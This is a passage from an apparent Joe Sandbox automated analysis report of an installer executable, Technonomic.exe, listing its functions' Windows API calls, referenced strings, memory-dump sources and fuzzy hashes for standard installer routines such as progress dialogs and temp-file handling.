SetFilePointer.KERNEL32(?,?,?,00000001,?,00000008,?,?,?,00000001), ref: 004026AB
MultiByteToWideChar.KERNEL32(?,00000008,?,00000000,?,00000001,?,00000001,?,00000008,?,?,?,00000001), ref: 004026C1

Part of subcall function 00405E39: SetFilePointer.KERNEL32(?,00000000,00000000,00000001), ref: 00405E4F

SetFilePointer.KERNEL32(?,?,?,00000001,?,?,00000002), ref: 0040276D

Strings

9, xrefs: 00402630

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: File$Pointer$ByteCharMultiWide$Read
String ID: 9
API String ID: 163830602-2366072709
Opcode ID: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction ID: 367b42b1b2af5c2ac759aacef6cd20ad90251cc9961805460d5ea366d256a81f
Opcode Fuzzy Hash: 54eb05019f2e59d002bdcf8ef70b12416628f11d58b5efd06b79a11da1a785d5
Instruction Fuzzy Hash: 19510874D00219ABDF209F94CA88ABEB779FF04344F50447BE501B72E0D7B99942DB69

Function 00402D9F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000), ref: 00402DBA
GetTickCount.KERNEL32 ref: 00402DD8
wsprintfW.USER32 ref: 00402E06

Part of subcall function 004052E2: lstrlenW.KERNEL32(Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000,?), ref: 0040531A
Part of subcall function 004052E2: lstrlenW.KERNEL32(00402E19,Completed,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402E19,00000000), ref: 0040532A
Part of subcall function 004052E2: lstrcatW.KERNEL32(Completed,00402E19,00402E19,Completed,00000000,00000000,00000000), ref: 0040533D
Part of subcall function 004052E2: SetWindowTextW.USER32(Completed,Completed), ref: 0040534F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405375
Part of subcall function 004052E2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040538F
Part of subcall function 004052E2: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040539D

CreateDialogParamW.USER32(0000006F,00000000,00402D04,00000000), ref: 00402E2A
ShowWindow.USER32(00000000,00000005), ref: 00402E38

Part of subcall function 00402D83: MulDiv.KERNEL32(004B2F9C,00000064,004B93FC), ref: 00402D98

Strings

... %d%%, xrefs: 00402E00

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSendWindow$lstrlen$CountCreateDestroyDialogParamShowTextTicklstrcatwsprintf
String ID: ... %d%%
API String ID: 722711167-2449383134
Opcode ID: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction ID: 2b011a82625418f68b8499a5732cb5b9e1a166e3b6ac7890347db752d15f278b
Opcode Fuzzy Hash: 76c6048a3b7cbdf23ef159d9fff81f0a9f13728c5e7eb0bec8d1179ea8a0becc
Instruction Fuzzy Hash: D7015230541624E7C6216B60EE4DA9B7668AF00B05B24407BF845F11E1DAB85455CBEE

Function 00404BAC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404BC7
GetMessagePos.USER32 ref: 00404BCF
ScreenToClient.USER32(?,?), ref: 00404BE9
SendMessageW.USER32(?,00001111,00000000,?), ref: 00404BFB
SendMessageW.USER32(?,0000113E,00000000,?), ref: 00404C21

Strings

f, xrefs: 00404BFD

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction ID: 2ee92d30c3d4f62541dcb72b74cb9552329c9a0a7836ec50a82d95606e957567
Opcode Fuzzy Hash: 96292700c6c1febd080c169329d2e770bb4f6d3abf554412e323a865936e6816
Instruction Fuzzy Hash: 33015E71900218BAEB10DBA4DD85FFEBBBCAF54711F10412BBA51B61D0D7B4AA058BA4

Function 00402D04 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402D22
wsprintfW.USER32 ref: 00402D56
SetWindowTextW.USER32(?,?), ref: 00402D66
SetDlgItemTextW.USER32(?,00000406,?), ref: 00402D78

Strings

verifying installer: %d%%, xrefs: 00402D4B, 00402D54
unpacking data: %d%%, xrefs: 00402D44

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: unpacking data: %d%%$verifying installer: %d%%
API String ID: 1451636040-1158693248
Opcode ID: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction ID: dce893d37650e0a5fad71f20df5db28da565fcefcb4dd95a10239a167aca93fc
Opcode Fuzzy Hash: 341d5f173f72d28821ee7b690774ab615ca69fb47453f4e2e3432960910f7c7f
Instruction Fuzzy Hash: 19F0367050020DABEF206F60DD49BEA3B69EF04309F00803AFA55B51D0DFBD59558F59

Function 00402840 Relevance: 9.1, APIs: 6, Instructions: 86memoryfileCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?,00000000,40000000,00000002,00000000,00000000), ref: 00402894
GlobalAlloc.KERNEL32(00000040,?,00000000,?), ref: 004028B0
GlobalFree.KERNEL32(?), ref: 004028E9
GlobalFree.KERNEL32(00000000), ref: 004028FC
CloseHandle.KERNEL32(?), ref: 00402914
DeleteFileW.KERNEL32(?,00000000,40000000,00000002,00000000,00000000), ref: 00402928

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: Global$AllocFree$CloseDeleteFileHandle
String ID:
API String ID: 2667972263-0
Opcode ID: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction ID: f14c02afffa7b7907a5fd564506058e77daa58a1031cefc6daed455ed9e34e83
Opcode Fuzzy Hash: c17071a172e6611300c6e5c6d8e6fb9818479fdaec624330b34eaa9cfd7f242d
Instruction Fuzzy Hash: FC216F72800118BBCF216FA5CE49D9E7E79EF09324F24423AF550762E0CB795E41DB98

Function 00404A9E Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00423748,00423748,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404B3F
wsprintfW.USER32 ref: 00404B48
SetDlgItemTextW.USER32(?,00423748), ref: 00404B5B

Strings

H7B, xrefs: 00404B31
%u.%u%s%s, xrefs: 00404B29

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$H7B
API String ID: 3540041739-107966168
Opcode ID: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction ID: bb4960df2745a4ac69d0d477934f6cb15a160bb02a324f12832b476a5784c287
Opcode Fuzzy Hash: 2c37dc16e7f305192eed0ac62bbfad02487635509ea4f811ded0739848cee536
Instruction Fuzzy Hash: 3611D873A441283BEB10656D9C45F9E329CDB81334F254237FA26F61D1E979D82146EC

Function 00402537 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 67stringCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll,00000400,?,?,00000021), ref: 00402583
lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll,?,?,artikulationer\Udsorteringerne,000000FF,C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll,00000400,?,?,00000021), ref: 0040258E

Strings

C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll, xrefs: 00402552, 00402575, 00402589, 004025D5
artikulationer\Udsorteringerne, xrefs: 0040257C

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: ByteCharMultiWidelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsa27B0.tmp\nsExec.dll$artikulationer\Udsorteringerne
API String ID: 3109718747-3228411233
Opcode ID: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction ID: 3fd77634d05d68e607a2feda7018aaef600362da1068c31595f6dded202503df
Opcode Fuzzy Hash: 35ecabcbfaf6731e74d8ae70dbfedeb1cffa6cf56a096f4227e0e6c723131c42
Instruction Fuzzy Hash: 33112772A01204BBDB10AFB18F4AA9F32669F54344F20403BF402F61C1DAFC8E91566E

Function 00401CFA Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00401D00
GetClientRect.USER32(00000000,?), ref: 00401D0D
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 00401D2E
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 00401D3C
DeleteObject.GDI32(00000000), ref: 00401D4B

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction ID: 2dd82fd711e3e4b5423ea32521429725dc25e45d8003ad5609f7a78d81fa071f
Opcode Fuzzy Hash: 26223df348314c12187df1a3a086258d1616f78344ebc1c33a08eb5c9aa33e1f
Instruction Fuzzy Hash: A7F0E172600504AFDB01DBE4DE88CEEBBBDEB48311B104476F541F51A1CA759D418B38

Function 00401D56 Relevance: 7.5, APIs: 5, Instructions: 38COMMON

Download Yara Rule

APIs

GetDC.USER32(?), ref: 00401D59
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401D66
MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D75
ReleaseDC.USER32(?,00000000), ref: 00401D86
CreateFontIndirectW.GDI32(0040CE00), ref: 00401DD1

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CapsCreateDeviceFontIndirectRelease
String ID:
API String ID: 3808545654-0
Opcode ID: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction ID: 540f35f5a36947b42322164f575acfe4ce77a432ba8ecb6b2d0148fd83f79f8e
Opcode Fuzzy Hash: 9d7988e3cd0506f91b59542dc0528f3f2e9c950226118d3629809f720825c0ab
Instruction Fuzzy Hash: EF01A231544640EFE7015BB0EF4EB9A3F74A7A5341F144579F941B62E2CAB801258BAD

Function 00401BDF Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C3F
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401C57

Strings

!, xrefs: 00401C13

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction ID: 8c23cbaaf3363c844559deeab64a920cb4d6fb7c8214554dffc13efcda3ce685
Opcode Fuzzy Hash: 11d4d904bb71dbb966a0ad9f723e74c8a428a9d9267570d3682b579917bfb7b7
Instruction Fuzzy Hash: FF219271940105BEEF01AFB4CE4AABE7B75EB44344F10403EF641B61D1D6B89A40D769

Function 00405BE2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,00425F50,Error writing temporary file. Make sure your temp folder is valid.,00405C56,00425F50,00425F50,76F93420,?,76F92EE0,00405994,?,76F93420,76F92EE0,"C:\Users\user\Desktop\Technonomic.exe"), ref: 00405BF0
CharNextW.USER32(00000000), ref: 00405BF5
CharNextW.USER32(00000000), ref: 00405C0D

Strings

Error writing temporary file. Make sure your temp folder is valid., xrefs: 00405BE2

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411948582.000000000044F000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Technonomic.jbxd

Similarity

API ID: CharNext
String ID: Error writing temporary file. Make sure your temp folder is valid.
API String ID: 3213498283-4064111799
Opcode ID: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction ID: 8ad88def47e2d38867cf9e91343d20e41dbac1805b4d4da5c0653217526e5d7e
Opcode Fuzzy Hash: f220efeea37ee359dd6515a544f61222e30bb784142ca8a223f370c395045e43
Instruction Fuzzy Hash: 2FF06261918F1D56EB317A584C55A7756B8EB96350B04843BD741B71C0D3BC48818EE9

Function 00405B37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B3D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,004033A3,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004035E2), ref: 00405B47
lstrcatW.KERNEL32(?,0040A014), ref: 00405B59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B37

Memory Dump Source

Source File: 00000000.00000002.1411671225.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1411650853.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411693748.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000413000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000418000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1411733169.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
